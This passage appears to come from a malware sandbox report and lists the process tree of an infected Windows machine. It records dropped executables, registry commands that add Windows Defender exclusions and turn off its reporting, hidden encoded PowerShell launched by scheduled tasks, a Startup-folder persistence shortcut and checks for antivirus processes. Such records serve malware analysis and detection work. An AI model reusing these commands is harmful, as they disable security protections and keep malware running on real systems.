"C:\Users\Admin\AppData\Local\Temp\win.exe"
12⤵
- Checks computer location settings
PID:1344

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 19
13⤵
PID:2752

C:\Users\Admin\AppData\Local\Temp\win.exe
C:\Users\Admin\AppData\Local\Temp\win.exe
13⤵
PID:5404

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5404 -s 124
14⤵
- Program crash
PID:4440

C:\Users\Admin\AppData\Local\Temp\anytime3.exe
"C:\Users\Admin\AppData\Local\Temp\anytime3.exe"
10⤵
PID:4544

C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe
"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"
10⤵
PID:1388

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1388 -s 1688
11⤵
- Program crash
PID:2720

C:\Users\Admin\Pictures\Adobe Films\IYEx72bTlmcph7YqkziCwtDG.exe
"C:\Users\Admin\Pictures\Adobe Films\IYEx72bTlmcph7YqkziCwtDG.exe"
7⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
PID:932

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im IYEx72bTlmcph7YqkziCwtDG.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\IYEx72bTlmcph7YqkziCwtDG.exe" & del C:\ProgramData\*.dll & exit
8⤵
PID:1056

C:\Windows\SysWOW64\taskkill.exe
taskkill /im IYEx72bTlmcph7YqkziCwtDG.exe /f
9⤵
- Kills process with taskkill
PID:5404

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
9⤵
- Executes dropped EXE
- Delays execution with timeout.exe
PID:1816

C:\Users\Admin\Pictures\Adobe Films\eMd30NO5w6CXpLgXXFSPbQav.exe
"C:\Users\Admin\Pictures\Adobe Films\eMd30NO5w6CXpLgXXFSPbQav.exe"
7⤵
- Executes dropped EXE
- Checks computer location settings
PID:1140

C:\Windows\SysWOW64\svchost.exe
"C:\Windows\System32\svchost.exe"
8⤵
PID:1636

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Detto.xla
8⤵
PID:2172

C:\Windows\SysWOW64\cmd.exe
cmd
9⤵
PID:2748

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq BullGuardCore.exe"
10⤵
- Enumerates processes with tasklist
PID:620

C:\Windows\SysWOW64\find.exe
find /I /N "bullguardcore.exe"
10⤵
PID:4956

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
10⤵
- Enumerates processes with tasklist
PID:4796

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
10⤵
PID:3872

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^wtwRMqjYMlcblhfrOaJNpOohYASICCRoGRaYHSofIqwzkvtDhVASceYjWNSjoDvlzhRaVdvWpzypNPwCvgcGwZMDTye$" Hai.xla
10⤵
PID:4952

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sta.exe.pif
Sta.exe.pif V
10⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5224

C:\Users\Admin\Pictures\Adobe Films\C3TEUj3w0my3sG6vseSS1ODk.exe
"C:\Users\Admin\Pictures\Adobe Films\C3TEUj3w0my3sG6vseSS1ODk.exe"
7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5068

C:\Users\Admin\Pictures\Adobe Films\d7FUmlKnk_qRsOdIAuaf_SlZ.exe
"C:\Users\Admin\Pictures\Adobe Films\d7FUmlKnk_qRsOdIAuaf_SlZ.exe"
7⤵
PID:4992

C:\Users\Admin\Pictures\Adobe Films\fN_PuiaPiDkjEZnsupuHGsck.exe
"C:\Users\Admin\Pictures\Adobe Films\fN_PuiaPiDkjEZnsupuHGsck.exe"
7⤵
- Executes dropped EXE
PID:4400

C:\Users\Admin\Pictures\Adobe Films\f3t_lQbSoGh1nC6Koq2DOK1A.exe
"C:\Users\Admin\Pictures\Adobe Films\f3t_lQbSoGh1nC6Koq2DOK1A.exe"
7⤵
PID:1692

C:\Users\Admin\Pictures\Adobe Films\f3t_lQbSoGh1nC6Koq2DOK1A.exe
"C:\Users\Admin\Pictures\Adobe Films\f3t_lQbSoGh1nC6Koq2DOK1A.exe"
8⤵
- Executes dropped EXE
PID:4892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 536
9⤵
- Program crash
PID:1704

C:\Users\Admin\Pictures\Adobe Films\X6dtQACQioqiebfEUtPmI4ox.exe
"C:\Users\Admin\Pictures\Adobe Films\X6dtQACQioqiebfEUtPmI4ox.exe"
7⤵
- Executes dropped EXE
PID:4880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4880 -s 464
8⤵
- Program crash
PID:1576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4880 -s 484
8⤵
- Program crash
PID:1208

C:\Users\Admin\Pictures\Adobe Films\EeyZAYeCN3aiMcSvuVipi9sT.exe
"C:\Users\Admin\Pictures\Adobe Films\EeyZAYeCN3aiMcSvuVipi9sT.exe"
7⤵
- Executes dropped EXE
PID:4964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 464
8⤵
- Program crash
PID:4140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 472
8⤵
- Program crash
PID:2512

C:\Users\Admin\Pictures\Adobe Films\mMCADPue24qpppaQrsAjgFjD.exe
"C:\Users\Admin\Pictures\Adobe Films\mMCADPue24qpppaQrsAjgFjD.exe"
7⤵
- Executes dropped EXE
PID:2920

C:\Users\Admin\AppData\Local\Temp\7zS3CC3.tmp\Install.exe
.\Install.exe
8⤵
- Executes dropped EXE
PID:2496

C:\Users\Admin\AppData\Local\Temp\7zS5DF7.tmp\Install.exe
.\Install.exe /S /site_id "525403"
9⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
PID:3156

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
10⤵
PID:4080

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
11⤵
PID:4664

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
12⤵
PID:768

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
12⤵
PID:5144

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
10⤵
PID:3556

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
11⤵
PID:5056

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
12⤵
PID:1784

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
12⤵
PID:4264

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gPKvXZNuC" /SC once /ST 04:23:46 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
10⤵
- Creates scheduled task(s)
PID:5300

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gPKvXZNuC"
10⤵
PID:6092

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gPKvXZNuC"
10⤵
PID:3948

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 18:22:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\sOpKwDq.exe\" j6 /site_id 525403 /S" /V1 /F
10⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2812

C:\Users\Admin\Pictures\Adobe Films\FmzEkQeE092RvzJXs6o8zx5r.exe
"C:\Users\Admin\Pictures\Adobe Films\FmzEkQeE092RvzJXs6o8zx5r.exe"
7⤵
- Executes dropped EXE
- Checks processor information in registry
PID:3124

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
8⤵
- Blocklisted process makes network request
PID:4516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 924
8⤵
- Program crash
PID:972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 1036
8⤵
- Program crash
PID:632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 1044
8⤵
- Program crash
PID:5040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 1076
8⤵
- Program crash
PID:5516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 1072
8⤵
- Program crash
PID:3588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 1084
8⤵
- Program crash
PID:5776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 1096
8⤵
- Program crash
PID:688

C:\Users\Admin\Pictures\Adobe Films\5DEw0GYq8p1VZbbph7v4UOlH.exe
"C:\Users\Admin\Pictures\Adobe Films\5DEw0GYq8p1VZbbph7v4UOlH.exe"
7⤵
PID:1816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1816 -s 2376
8⤵
- Program crash
PID:1848

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue028a363eda.exe
5⤵
- Suspicious use of WriteProcessMemory
PID:2204

C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue028a363eda.exe
Tue028a363eda.exe
6⤵
- Executes dropped EXE
PID:1560

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue02522f9ea0b1.exe
5⤵
- Suspicious use of WriteProcessMemory
PID:1760

C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue02522f9ea0b1.exe
Tue02522f9ea0b1.exe
6⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1664

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
5⤵
- Suspicious use of WriteProcessMemory
PID:3988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2088 -s 600
5⤵
- Program crash
PID:4384

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1332

C:\Users\Admin\AppData\Local\Temp\4D92.exe
C:\Users\Admin\AppData\Local\Temp\4D92.exe
2⤵
- Checks computer location settings
PID:4076

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Confronto.vsd
3⤵
PID:5908

C:\Windows\SysWOW64\cmd.exe
cmd
4⤵
PID:4996

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq BullGuardCore.exe"
5⤵
- Enumerates processes with tasklist
PID:3228

C:\Windows\SysWOW64\find.exe
find /I /N "bullguardcore.exe"
5⤵
PID:6108

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
5⤵
- Enumerates processes with tasklist
PID:6064

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
5⤵
PID:2744

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^zsXALugVPsbikcLGmlTQMSJGkUUtRoHQkZmHLQyLLuVpnCdInRQPNWfBIsgQkprGKGWkWrUJtiyFXmiJDk$" Che.vsd
5⤵
PID:5160

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Avvelenate.exe.pif
Avvelenate.exe.pif V
5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:4416

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Avvelenate.exe.pif
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Avvelenate.exe.pif
6⤵
PID:5764

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Avvelenate.exe.pif
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Avvelenate.exe.pif
6⤵
PID:4232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4232 -s 12
7⤵
- Program crash
PID:456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4232 -s 52
7⤵
- Program crash
PID:5484

C:\Users\Admin\AppData\Local\Temp\5DDF.exe
C:\Users\Admin\AppData\Local\Temp\5DDF.exe
2⤵
PID:3416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 464
3⤵
- Program crash
PID:5132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 472
3⤵
- Program crash
PID:6088

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
2⤵
PID:6072

C:\Windows\explorer.exe
C:\Windows\explorer.exe
2⤵
PID:5696

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
2⤵
PID:2784

C:\Windows\explorer.exe
C:\Windows\explorer.exe
2⤵
- Executes dropped EXE
PID:5740

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
2⤵
PID:4048

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
2⤵
PID:5840

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
2⤵
PID:4940

C:\Windows\explorer.exe
C:\Windows\explorer.exe
2⤵
PID:1404

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
2⤵
PID:4824

C:\Windows\SysWOW64\cmd.exe
cmd /c echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VSmEbpnuyD.url" & echo URL="C:\Users\Admin\AppData\Local\Temp\aYSXsebblL\wyTKUHhh.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VSmEbpnuyD.url"
2⤵
PID:1264

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2088 -ip 2088
1⤵
PID:4220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3624 -ip 3624
1⤵
PID:4988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1828 -ip 1828
1⤵
PID:3588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3624 -ip 3624
1⤵
PID:4432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3624 -ip 3624
1⤵
PID:1420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3624 -ip 3624
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 3624 -ip 3624
1⤵
PID:884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3624 -ip 3624
1⤵
PID:4276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 3624 -ip 3624
1⤵
PID:5008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3624 -ip 3624
1⤵
PID:4204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3624 -ip 3624
1⤵
PID:2444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4964 -ip 4964
1⤵
PID:4060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4880 -ip 4880
1⤵
PID:1252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 4964 -ip 4964
1⤵
PID:4648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4880 -ip 4880
1⤵
PID:5052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4828 -ip 4828
1⤵
PID:3048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4892 -ip 4892
1⤵
PID:1252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3124 -ip 3124
1⤵
PID:4056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4828 -ip 4828
1⤵
PID:2984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4828 -ip 4828
1⤵
PID:4080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4828 -ip 4828
1⤵
PID:4888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1816 -ip 1816
1⤵
PID:3868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4828 -ip 4828
1⤵
PID:1400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4296 -ip 4296
1⤵
PID:940

C:\Users\Admin\AppData\Roaming\dtufvra
C:\Users\Admin\AppData\Roaming\dtufvra
1⤵
- Executes dropped EXE
PID:4868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4828 -ip 4828
1⤵
PID:2508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3124 -ip 3124
1⤵
PID:1692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4296 -ip 4296
1⤵
PID:5032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4828 -ip 4828
1⤵
PID:1600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3124 -ip 3124
1⤵
PID:660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4296 -ip 4296
1⤵
PID:5448

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 524 -p 5740 -ip 5740
1⤵
PID:5792

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:5264

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
2⤵
PID:3108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 3124 -ip 3124
1⤵
PID:3228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4296 -ip 4296
1⤵
PID:4812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4828 -ip 4828
1⤵
PID:5432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 3624 -ip 3624
1⤵
PID:4824

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
- Modifies data under HKEY_USERS
PID:5244

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
1⤵
- Process spawned unexpected child process
PID:4660

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
2⤵
PID:1576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1576 -ip 1576
1⤵
PID:6028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4296 -ip 4296
1⤵
PID:3808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3124 -ip 3124
1⤵
PID:5552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3624 -ip 3624
1⤵
PID:804

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 548 -p 4544 -ip 4544
1⤵
PID:2844

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 556 -p 1388 -ip 1388
1⤵
- Loads dropped DLL
PID:1576

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:3680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4296 -ip 4296
1⤵
PID:5760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3124 -ip 3124
1⤵
PID:2996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 3624 -ip 3624
1⤵
PID:5332

C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\sOpKwDq.exe
C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\sOpKwDq.exe j6 /site_id 525403 /S
1⤵
- Drops file in System32 directory
PID:5824

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f 